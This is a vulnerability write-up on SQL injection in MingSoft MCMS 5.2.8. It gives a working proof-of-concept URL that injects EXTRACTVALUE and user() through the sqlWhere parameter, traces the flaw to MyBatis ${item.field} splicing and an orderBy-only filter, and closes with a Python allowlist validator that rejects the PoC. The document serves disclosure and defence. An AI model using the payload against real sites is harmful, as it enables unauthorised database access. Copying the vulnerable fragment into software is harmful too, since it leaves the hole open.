0x00 Preface
MingSoft CMS (铭飞CMS) is a lightweight open-source content management system written in Java.
Affected version: MingSoft MCMS 5.2.8
0x01 Vulnerability reproduction
PoC:
/mdiy/dict/listExcludeApp?dicType=1&orderBy=1&sqlWhere=[{"action"%3a"","field"%3a"1+AND+EXTRACTVALUE(4095,CONCAT(0x7e,(select user()),0x7e))","el":"eq","model":"contentTitle","name":"123","type":"input","value":"a"}]
Reproduction:
0x02 Code audit
Searching the whole project for sqlWhere, src\main\java\net\mingsoft\cms\dao\IContentDao.xml includes a SQL fragment that lives in an external jar:
<include refid="net.mingsoft.base.dao.IBaseDao.sqlWhere"></include>
Following the refid to its definition leads to net.mingsoft.base.dao.IBaseDao.xml.
The refid above is the fragment's id. The foreach iterates over sqlWhereList, with item bound to each element of the list (you can simply think of item as one entry of sqlWhereList). ${item.field} is an obvious injection point: MyBatis splices ${} into the SQL text verbatim, unlike #{}, which becomes a bound parameter. So every statement that includes the fragment with id sqlWhere is vulnerable to SQL injection.
<sql id="sqlWhere" databaseId="mysql">
    <if test="sqlWhereList != null">
        <foreach collection="sqlWhereList" item="item" index="index" open="and( " separator=" " close=" )">
            <if test="item.el == 'eq'">
                <choose>
                    <when test="item.multiple != null and item.multiple == true"> FIND_IN_SET(#{item.value}, ${item.field})>0
                    </when>
                    <otherwise>
                        ${item.field} = #{item.value}
                    </otherwise>
                </choose>
            </if>
            <if test="item.el == 'gt'">
                <choose>
                    <when test="item.type=='time'||item.type=='date'">
                        <if test="item.type=='time'">
                            date_format(${item.field},'%T') > date_format(#{item.value},'%T') </if>
                        <if test="item.type=='date'">
                            date_format(${item.field},'%Y-%m-%d %H:%i:%s') > date_format(#{item.value},'%Y-%m-%d %H:%i:%s')
                        </if>
                    </when>
                    <otherwise>
                        ${item.field} > #{item.value}
                    </otherwise>
                </choose>
            </if>
            <!-- remainder of the fragment omitted in this excerpt -->
        </foreach>
    </if>
</sql>
In net\mingsoft\ms-mdiy\2.1.13.1\ms-mdiy-2.1.13.1.jar!\net\mingsoft\mdiy\dao\IDictDao.xml, the queryExcludeApp statement includes that sqlWhere fragment:
<select id="queryExcludeApp" resultMap="resultMap">
    select * from mdiy_dict
    <where>
        <!-- omitted -->
        <include refid="net.mingsoft.base.dao.IBaseDao.sqlWhere"></include>
    </where>
</select>
Tracing back into the DAO layer, the queryExcludeApp method of IDictDao.java maps to this statement; one level up, queryExcludeApp in net\mingsoft\mdiy\biz\impl\DictBizImpl.java calls dictDao.queryExcludeApp:
@Override
public List queryExcludeApp(DictEntity dictEntity) {
    return dictDao.queryExcludeApp(dictEntity);
}
Continuing up the call chain, the listExcludeApp method behind the /listExcludeApp route calls dictBiz.queryExcludeApp(dict). The controller itself is mapped under /mdiy/dict, so the vulnerable URL is /mdiy/dict/listExcludeApp?dicType=
@GetMapping("/listExcludeApp")
@ResponseBody
public ResultData listExcludeApp(@ModelAttribute @ApiIgnore DictEntity dict, HttpServletResponse response, HttpServletRequest request) {
    SqlInjectionUtil.filterContent(dict.getOrderBy()); // only orderBy is filtered; sqlWhere is bound from the request untouched
    dict.setDictEnable(true);
    List dictList = dictBiz.queryExcludeApp(dict); // here
    return ResultData.build().success(dictList);
}
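As an added example, not MCMS's own code, the following Python models the check a defender would put in front of the query above: the sqlWhere list is parsed as JSON, each entry's field must be a bare identifier on a column allowlist, the operator must be one of a fixed set, and the value is always passed as a bind parameter (the role #{} plays in MyBatis), never spliced into the SQL text (the role ${} plays in the fragment). It covers both the ${item.field} interpolation in the sqlWhere fragment and the controller, where SqlInjectionUtil.filterContent is applied only to orderBy. The table layout, column allowlist and sample rows are constructed for the demo, sqlite3 stands in for MySQL, and the page's PoC (URL-decoded) is reused only as a rejected input.

```python
import json
import re
import sqlite3

# Constructed allowlist of filterable columns for the demo table below. The real
# column names of mdiy_dict are not shown on the page, so these are hypothetical.
ALLOWED_FIELDS = {"id", "dict_type", "dict_label", "dict_value"}
# Operators the filter accepts, mapped to the SQL the fragment would emit.
ALLOWED_OPS = {"eq": "=", "gt": ">", "lt": "<"}
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

# The page's PoC with its URL encoding undone, used here only as an input that must be rejected.
POC_SQL_WHERE = (
    '[{"action":"","field":"1 AND EXTRACTVALUE(4095,CONCAT(0x7e,(select user()),0x7e))",'
    '"el":"eq","model":"contentTitle","name":"123","type":"input","value":"a"}]'
)


class FilterRejected(ValueError):
    """Raised when the sqlWhere parameter or one of its entries fails validation."""


def parse_sql_where(raw):
    """Parse the JSON list carried by the sqlWhere query parameter."""
    try:
        items = json.loads(raw)
    except (json.JSONDecodeError, TypeError) as exc:
        raise FilterRejected(f"sqlWhere is not valid JSON: {exc}") from None
    if not isinstance(items, list) or not all(isinstance(i, dict) for i in items):
        raise FilterRejected("sqlWhere must be a JSON list of objects")
    return items


def build_where(items):
    """Turn validated filter entries into a WHERE fragment plus bound parameters.

    The column name is the only thing interpolated into the SQL text, and only
    after it passed both the identifier regex and the allowlist; the value is
    always a bind parameter, mirroring #{} instead of ${}.
    """
    clauses, params = [], []
    for item in items:
        field = str(item.get("field", ""))
        op = str(item.get("el", ""))
        value = item.get("value")
        if not IDENT_RE.match(field) or field not in ALLOWED_FIELDS:
            raise FilterRejected(f"field not allowed: {field!r}")
        if op not in ALLOWED_OPS:
            raise FilterRejected(f"operator not allowed: {op!r}")
        if not isinstance(value, (str, int, float, type(None))):
            raise FilterRejected("value must be a scalar")
        clauses.append(f"{field} {ALLOWED_OPS[op]} ?")
        params.append(value)
    where = " AND ".join(clauses) if clauses else "1=1"
    return where, params


def is_accepted(raw):
    """True if the sqlWhere parameter would be allowed through to the query."""
    try:
        build_where(parse_sql_where(raw))
        return True
    except FilterRejected:
        return False


def query_dict(raw_sql_where):
    """Run a validated filter against a constructed in-memory table (sqlite3 in place of MySQL)."""
    where, params = build_where(parse_sql_where(raw_sql_where))
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE mdiy_dict (id INTEGER, dict_type TEXT, dict_label TEXT, dict_value TEXT)")
    con.executemany("INSERT INTO mdiy_dict VALUES (?,?,?,?)", [
        (1, "1", "red", "r"), (2, "1", "blue", "b"), (3, "2", "small", "s"),  # constructed rows
    ])
    rows = con.execute(f"SELECT id, dict_label FROM mdiy_dict WHERE {where} ORDER BY id", params).fetchall()
    con.close()
    return rows


if __name__ == "__main__":
    print(query_dict('[{"field":"dict_type","el":"eq","value":"1"}]'))
    print("PoC accepted:", is_accepted(POC_SQL_WHERE))
```

The allowlist is the important part: an identifier regex alone would still let a caller filter on any column of the table, so the set of filterable columns should be declared per statement rather than derived from the request.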